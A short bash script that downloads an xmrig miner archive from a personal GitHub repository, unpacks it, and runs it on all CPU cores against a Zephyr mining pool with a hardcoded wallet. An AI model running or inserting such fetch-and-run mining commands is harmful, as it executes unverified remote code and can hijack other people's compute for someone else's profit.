#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o sg.zephyr.herominers.com:1123 -u ZEPHsAkYuX2Qvkw4vhrCY6YJSTAdtKdjUFQ9PjkrgaKD9pmKb8B5ZXUcQHbzG4S2YKfhAsVARPNpma5BAsd9u2paVJvs89UiQqT -p SEENG -a rx/0 -t $(nproc --all)
